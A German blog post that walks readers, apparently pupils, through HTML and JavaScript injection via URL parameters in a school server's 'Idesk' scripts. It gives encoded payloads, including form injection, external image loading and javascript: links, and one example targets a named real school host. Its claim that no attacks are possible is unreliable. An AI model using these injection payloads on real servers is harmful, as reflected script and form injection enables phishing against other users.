Homepage nach Idesk Art
Es gibt die Möglichkeit, über einen PHP angepassten Parameter bei der „nosel.php“ die Ausgabe nach den eigenen Wünschen zu verändern. Wie bei PHP üblich werden Variablen und andere Parameter über die URL an das Script weitergereicht, bekommt dieses PHP-Script nun eine angepasste Variable übergeben, wird diese brav vom System verarbeitet. Somit ist es möglich, HTML-Befehle an Idesk zu senden. PHP Befehle werden zum Glück nicht verarbeitet. Dadurch sind keine Angriffe möglich. Javascript ist ebenfalls möglich, jedoch erfordert es ein wenig mehr Arbeit, deswegen gehe ich darauf erst später im Artikel ein.
Zugegeben, eine ganze Homepage kann man dann doch nicht mit diesem Trick erstellen. Für ein paar Spielereien reicht es jedoch schon. Doch kommen wir nun zum eigentlichen Code.
www.deiniserv.de/idesk/misc/nosel.php?text=bla
Diese Zeile ist unser Ausgangspunkt für weitere Experimente. Wie man sieht wird die Variable „text“ mit den Zeichen „bla“ gefüllt. Um das ganze dann an den Idesk zu schicken, muss man es einfach in die Adresszeile seines Browsers tippen und aufrufen. Aber das sollte eigentlich jeder wissen.
So bekommen wir also einen einfachen Text ausgegeben, doch wir wollen ein bisschen mehr. Versuchen wir mal ein Bild zu laden.
Dazu gibt man einfach mal das ein und schaut was passiert.
www.deiniserv.deidesk/misc/nosel.php?text=%3Cimg%20src=/idesk/img/mx.php/tv/16/mail.png
Es ist mit dieser Methode nicht möglich, externe Bilder zu laden. Nur Bilder die sich auf dem Idesk-Server befinden können geladen werden. Doch es gibt eine Möglichkeit externe Bilder zu laden. Dazu aber später mehr.
Zusätzlich zu der „nosel.php“ nimmt die „block.php“ HTML-Code an und verarbeitet diesen. Doch ich glaube die Zeit ist reif für ein wenig komplexere Gebilde. Versuchen wir doch mal ein ganzes Formular zu erstellen 
Als Grundlage für diese Versuche dient folgender Code:
/idesk/inet/block.php?grp=Du bist ein Leser von meinem Blog&url=test
Um unsere HTML-Befehle ausgeführt zu bekommen muss man jedoch die URL kürzen auf:
/idesk/inet/block.php?url=test
Doch hier erstmal ein paar HTML-Basics:
1.Ein Input-Eingabefeld erstellt man mit:
%3Cinput%20type=%22text%22%20value=%22Text%22%3C/input%3E
2.Einen Button mit:
%3Cinput%20type=%22submit%22%20value=%22Klick%20mich!%22%3C/input%3E
3.Einen Radiobutton mit:
%3Cinput%20type=%22radio%22%20name=%22baum%22%3E
4.Eine Checkbox mit:
%3Cinput%20type=%22checkbox%22%20name=%22baum%22%3E
Man kann jedoch keine Events auslösen wie z.B. „onClick“. Was aber auch gut ist, denn sonst könnte man eventuell Phishing betreiben, also an die Passwörter anderer Nutzer kommen. Bekannter Weise gilt es jedoch private Daten zu schützen. Im Großen und Ganzen gilt eh der Grundsatz: Was du nicht willst das man dir tut, dass füg auch keinem anderen zu.
Hier jedoch mal ein Beispiel, was man alles so anstellen kann.
http://gymnohz.de/idesk/inet/block.php?url=%3Cinput%20type=%22radio%22%20name=%22recht%22%20value=%22%22%3EBenutzer%3C/br%3E%3Cinput%20type=%22radio%22%20name=%22recht%22%20value=%22%22%3ESicherheit%3C/br%3E%3Cinput%20type=%22submit%22%20value=%22Senden%22%3C/input%3E%20%20%3Cinput%20type=%22text%22%20value=%22Freu%20dich!%22%3C/input%3E%93%20%20%3Cinput%20type=%22reset%22%20value=%22Abbrechen%22%3C/input%3E
Laden von externen Bildern:
Wie bereits geschrieben ist es nicht ohne Weiteres möglich Bilder von externen Quellen zu laden. Aber man kann einen Umweg gehen, indem man einen INPUT vom Type Image erstellt und dann den Pfad zum externen Bild angibt.
Der Code dafür sieht dann in etwa so aus:
http://gymnohz.de/idesk/inet/block.php?url=%3Cinput%20type=%22image%22%20src=%22http://de.php.net/images/php.gif%22%22%3C/input%3E
Hübsch wie ich finde
Javascript senden:
Ähnlich wie bei dem Laden von externen Bildern müssen wir das Javascript verschachteln um dafür zu sorgen das es ausgeführt wird.
%3Ca%20href=%22javascript:document.write(‘test’)%22%3EJavascript%3C/a%3E
Der Code wird dann Lokal auf dem eigenen Browser ausgeführt.
Mit diesem Code kann man übrigens die gute alte Alert-Box anzeigen.
%3Ca%20href=%22javascript:alert(‘Alarm!’)%22%3EKlicken%3C/a%3E
Es gibt natürlich noch viel mehr Möglichkeiten, was man alles machen kann…aber das würde hier den Rahmen sprengen. Ich kann jedoch SELFHTML empfehlen.
Dadurch, dass man mit diesen Beispielen keinen Schaden anrichten kann, sehe ich auch keine Probleme darin diesen Text zu veröffentlichen. Er stellt keine Anleitung für irgendwelche Angriffe dar. Man kann höchstens seine Klassenkameraden damit beeindrucken, was für eine lustige Fehlermeldungen man doch bekommen hat. 
